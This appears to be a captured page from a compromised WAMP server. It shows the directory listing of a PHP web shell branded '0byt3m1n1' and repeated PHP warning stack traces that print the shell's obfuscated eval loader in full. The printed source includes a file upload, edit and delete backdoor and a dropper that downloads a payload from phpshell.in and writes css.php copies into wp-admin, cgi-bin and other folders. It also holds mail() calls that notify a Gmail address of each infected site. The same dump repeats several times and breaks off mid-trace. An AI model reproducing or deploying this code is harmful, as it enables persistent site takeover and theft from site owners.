0byt3m1n1

Path: C:/Program Files (x86)/Microsoft Office/Office12/INFFORMS/1033/
[ Home ]

Name
Size
Permissions
Last Update
Options
[F] ABSNCREQ.XSN
24.465 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] AGENDA.XSN
36.912 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] APPRATE.XSN
25.956 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] ASSETTRA.XSN
14.556 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] ASSETTRK.XSN
27.526 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] CHGORD.XSN
25.792 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] EXPENSER.XSN
18.549 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] EXPRPTD.XSN
22.816 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] EXPRPTI.XSN
22.833 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] INVOICED.XSN
23.67 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] INVOICES.XSN
23.695 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] INVREQ.XSN
22.279 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] ISSTRKD.XSN
21.625 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] ISSTRKS.XSN
21.651 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] MEETINGA.XSN
17.304 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] PERFRVW.XSN
27.082 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] PROJECT.XSN
32.302 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] PURCHORD.XSN
26.044 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] PURCHREQ.XSN
25.699 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] RESUME.XSN
25.412 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] SALESRPT.XSN
21.542 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] STATRPT.XSN
23.039 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] STATUSRE.XSN
18.062 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] SVCREQ.XSN
22.987 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] TCARDDTL.XSN
27.277 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] TCARDSMP.XSN
25.128 KB
-rw-rw-rw-
26-Oct-2006 16:13
[F] TRAVELRE.XSN
22.175 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] TRAVITN.XSN
23.255 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] TRAVREQ.XSN
23.685 KB
-rw-rw-rw-
26-Oct-2006 16:12
[F] VENDINFO.XSN
26.809 KB
-rw-rw-rw-
26-Oct-2006 16:13

© 2017 - ZeroByte.ID.


( ! ) Warning: fopen(C:/wamp64/www/js/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 95
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0706527104fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:95
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 96
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0785539504fwrite ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:96
( ! ) Warning: fclose() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 97
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0815539504fclose ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:97 not exitsdone .
( ! ) Warning: fopen(C:/wamp64/www/modules/css.php): failed to open stream: No such file or directory in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 105
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

'; if(isset($_GET['path'])) {$path = $_GET['path'];chdir($_GET['path']);} else {$path = getcwd();} $path = str_replace("\\","/",$path);$paths = explode("/", $path); echo '
';echo "Path: "; foreach($paths as $id => $pat) {echo "$pat/";} echo '
[ Home ]
'; if(isset($_FILES['file'])){ if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){ echo '
Upload OK!.

';} else{echo '
Upload Failed!.

';}} echo '
'; if(isset($_GET['filesrc'])){ echo '
File: ';echo "".basename($_GET['filesrc']);"";echo '

';echo("
");} elseif(isset($_GET['option']) && $_POST['opt'] != 'delete'){ echo '

'.$_POST['path'].'

'; if($_POST['opt'] == 'rename'){ if(isset($_POST['newname'])){ if(rename($_POST['path'],$path.'/'.$_POST['newname'])){ echo '
Rename OK!

'; }else{ echo '
Rename Failed!

'; } $_POST['name'] = $_POST['newname'];} echo '
New Name :
'; }elseif($_POST['opt'] == 'edit'){ if(isset($_POST['src'])){ $fp = fopen($_POST['path'],'w');if(fwrite($fp,$_POST['src'])){echo '
Edit File OK!.

'; }else{echo '
Edit File Failed!.

';}fclose($fp);} echo '

';}echo '
';}else{echo '
'; if(isset($_GET['option']) && $_POST['opt'] == 'delete'){ if($_POST['type'] == 'dir'){ if(rmdir($_POST['path'])){ echo '
Dir Deleted!

'; }else{echo '
Delete Dir Failed!

';} }elseif($_POST['type'] == 'file'){ if(unlink($_POST['path'])){echo 'Delete File Done.
';}else{ echo 'Delete File Error.
';}}}echo '
'; $scandir = scandir($path); echo '
'; foreach($scandir as $dir){ if(!is_dir("$path/$dir") || $dir == '.' || $dir == '..') continue; echo "";} foreach($scandir as $file){if(!is_file("$path/$file")) continue;$size = filesize("$path/$file")/1024; $size = round($size,3);if($size >= 1024){$size = round($size/1024,2).' MB';}else{$size = $size.' KB';} echo "";} echo '
Name
Size
Permissions
Last Update
Options
[D] $dir
--
"; if(is_writable("$path/$dir")) echo ''; elseif(!is_readable("$path/$dir")) echo ''; echo perms("$path/$dir"); if(is_writable("$path/$dir") || !is_readable("$path/$dir")) echo ''; echo"
".date("d-M-Y H:i", filemtime("$path/$dir"))."";echo "
[F] $file
".$size."
"; if(is_writable("$path/$file")) echo ''; elseif(!is_readable("$path/$file")) echo ''; echo perms("$path/$file"); if(is_writable("$path/$file") || !is_readable("$path/$file")) echo ''; echo"
".date("d-M-Y H:i",filemtime("$path/$file")).""; echo "
';}echo ''; function perms($file){$perms = fileperms($file);if (($perms & 0xC000) == 0xC000) {$info = 's';} elseif (($perms & 0xA000) == 0xA000) {$info = 'l';} elseif (($perms & 0x8000) == 0x8000) {$info = '-';} elseif (($perms & 0x6000) == 0x6000) {$info = 'b';} elseif (($perms & 0x4000) == 0x4000) {$info = 'd';} elseif (($perms & 0x2000) == 0x2000) {$info = 'c';} elseif (($perms & 0x1000) == 0x1000) {$info = 'p';} else {$info = 'u';} $info .= (($perms & 0x0100) ? 'r' : '-');$info .= (($perms & 0x0080) ? 'w' : '-');$info .= (($perms & 0x0040) ? (($perms & 0x0800) ? 's' : 'x' ) : (($perms & 0x0800) ? 'S' : '-'));$info .= (($perms & 0x0020) ? 'r' : '-');$info .= (($perms & 0x0010) ? 'w' : '-');$info .= (($perms & 0x0008) ? (($perms & 0x0400) ? 's' : 'x' ) : (($perms & 0x0400) ? 'S' : '-'));$info .= (($perms & 0x0004) ? 'r' : '-');$info .= (($perms & 0x0002) ? 'w' : '-');$info .= (($perms & 0x0001) ? (($perms & 0x0200) ? 't' : 'x' ) : (($perms & 0x0200) ? 'T' : '-'));return $info;} echo'
© 2017 - ZeroByte.ID.

';?>"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/modules/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/includes/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/sites/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check2 = $_SERVER['DOCUMENT_ROOT'] . "/css/css.php" ; $text2 = http_get('http://phpshell.in/txt/lamer.txt'); $open2 = fopen($check2, 'w'); fwrite($open2, $text2); fclose($open2); if(file_exists($check2)){ echo $check2."
"; }else echo "not exits2"; echo "done2 .\n " ; $check = $_SERVER['DOCUMENT_ROOT'] . "/cgi-bin/css.php" ; $text = http_get('http://phpshell.in/txt/lamer.txt'); $open = fopen($check, 'w'); fwrite($open, $text); fclose($open); if(file_exists($check)){ echo $check."
"; }else echo "not exits"; echo "done .\n " ; $check3=$_SERVER['DOCUMENT_ROOT'] . "/css.php" ; $text3 = http_get('http://phpshell.in/txt/lamer.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3); $check6=$_SERVER['DOCUMENT_ROOT'] . "/images/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); $check6=$_SERVER['DOCUMENT_ROOT'] . "/wp-admin/css.php" ; $text6 = http_get('http://phpshell.in/txt/lamer.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6); ?> Sender Yazdirildi.
SITE YOL : '.$yol.'
Sender Yolu : inc/inc.php'; $header .= "From: SheLL Boot \n"; $header .= "Content-Type: text/html; charset=utf-8\n"; @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); @mail("byhero44@gmail.com", "Hacklink Bildiri", "$y", $header); } ?>'
)...\mr1.php(2) : eval()'d code:1 40.0997539504fopen ( )...\mr1.php(2) : eval()'d code(1) : eval()'d code:105
( ! ) Warning: fwrite() expects parameter 1 to be resource, bool given in C:\wamp64\www\WaterCat\gallery\mr1.php(2) : eval()'d code(1) : eval()'d code on line 106
Call Stack
#TimeMemoryFunctionLocation
10.0001406416{main}( )...\mr1.php:0
20.0002408960eval( '$_X=base64_decode($_X);$_X=strtr($_X,'123456aouie','aouie123456');$_R=str_replace('__FILE__',"'".$_F."'",$_X);eval($_R);$_R=0;$_X=0;' )...\mr1.php:2
30.0015521464eval( '?>0byt3m1n1

0byt3m1n1

